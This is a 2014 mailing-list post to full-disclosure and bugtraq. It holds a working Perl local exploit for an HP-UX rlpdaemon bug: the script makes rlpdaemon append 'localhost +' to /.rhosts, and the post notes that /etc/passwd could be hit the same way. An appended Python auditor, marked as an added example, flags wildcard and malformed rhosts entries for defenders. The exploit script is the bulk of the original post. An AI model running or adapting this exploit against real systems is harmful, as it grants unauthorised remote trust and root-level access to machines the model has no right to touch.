Message-ID: <93036929ad62ab0d2cafff2a2ede78fb@dizum.com>
Date: Sun, 16 Mar 2014 02:20:01 +0100 (CET)
From: Nomen Nescio <nobody@...um.com>
To: full-disclosure@...ts.grok.org.uk,bugtraq@...urityfocus.com
Subject: exploit for old rlpdaemon bug

#!/opt/perl5/bin/perl -w

# HP-UX rlpdaemon local exploit
# Bulletin HPSBUX0111-176  (November 2001)
#
# For use only on machines where you have legitimate root.
# This attempts to add junk (including "localhost +") to /.rhosts.
# Obvious variants could include /etc/passwd.

use IO::Socket;

$PORT = 9000;   # pick something not in use

$pid=fork;
die("fork: $!") unless (defined($pid));

if (0 == $pid) {
    # child - server, exec rlpdaemon with chosen argv

    $IPPROTO_TCP=6;
    $SOCK_STREAM=1;
    $AF_INET=2;
    $PF_INET=2;

    $sockaddr='S n a4 x8';  # packed socket data

    $this=pack($sockaddr, $AF_INET, $PORT, "\0\0\0\0") or die("pack: $!");
    socket(S, $PF_INET, $SOCK_STREAM, $IPPROTO_TCP) || die ("socket: $!");
    bind(S, $this) or die("bind: $!");
    listen(S, 5) or die("listen: $!");
    $addr=accept(NS, S) or die("accept: $!");

    # dup2 on 3 standard streams
    open(STDIN, "+<&NS") or die("dup2: $!");
    open(STDOUT, "+>&NS") or die("dup2: $!");
    open(STDERR, "+>&NS") or die("dup2: $!");

    exec {"/usr/sbin/rlpdaemon"}
        "\nlocalhost +\n",
        "-i", "-l", "-L", "/.rhosts";
    # UNREACHED
    exit(1);
}

sleep 5;   # let server start before we connect to it

# parent - connect to server with loggable action
$remote = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => "localhost",
    PeerPort => $PORT
)
or die "cannot connect to port $PORT at localhost";

# RFC1179
printf($remote "%clp\n", 2);  # rlpdaemon should log this
close($remote);
exit(0);

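The payload above lands in a trust file as an appended `.rhosts` line, so the defender's check is on the trust file itself. The following is an added example, not part of the original post or of HP-UX: it parses rhosts-style files (`host [user]` per line, `+` as a wildcard in either field) and flags wildcard and malformed entries. The sample file contents are constructed; nothing is assumed about rlpdaemon's log line format.

```python
"""Audit rhosts-style trust files for wildcard and malformed entries.

Added example, not code from the original post. An rhosts line is
"host [user]"; a "+" in either field is a wildcard that grants rlogin/rsh
trust to any host or any remote user. The constructed sample below includes
the "localhost +" line the exploit appends, plus the classic "+ +".
"""

import re
from dataclasses import dataclass

# Characters that can legitimately appear in a host field: hostnames,
# leading "-" (negative entry) or "+"/"+@netgroup" forms.
HOST_FIELD = re.compile(r"[-+@\w.]+")


@dataclass
class Finding:
    lineno: int
    line: str
    reason: str


def parse_rhosts_line(line):
    """Return (host, user) for one entry, or None for blank/comment lines."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    fields = stripped.split()
    host = fields[0]
    user = fields[1] if len(fields) > 1 else None
    return host, user


def audit_rhosts(text):
    """Return a list of Finding objects for risky lines in an rhosts file."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        parsed = parse_rhosts_line(line)
        if parsed is None:
            continue
        host, user = parsed
        if host == "+":
            findings.append(Finding(lineno, line, "wildcard host: any host is trusted"))
        if user == "+":
            findings.append(Finding(lineno, line, "wildcard user: any remote user is trusted"))
        # More than two fields, or odd characters in the host field, suggests
        # something other than a hand-written trust entry was appended here.
        if len(line.split()) > 2 or not HOST_FIELD.fullmatch(host):
            findings.append(Finding(lineno, line, "malformed entry: possible appended debris"))
    return findings


# Constructed sample: one legitimate entry, then the two lines an auditor
# should never want to see in /.rhosts.
SAMPLE_RHOSTS = """# legitimate trust entry
backup.example.com oper

localhost +
+ +
"""

if __name__ == "__main__":
    for f in audit_rhosts(SAMPLE_RHOSTS):
        print(f"line {f.lineno}: {f.reason!s:45} {f.line!r}")
```

Run against a real file with `audit_rhosts(open('/.rhosts').read())`; an empty result means no wildcard or malformed entries, not that the file is trustworthy, so review the remaining host names by hand.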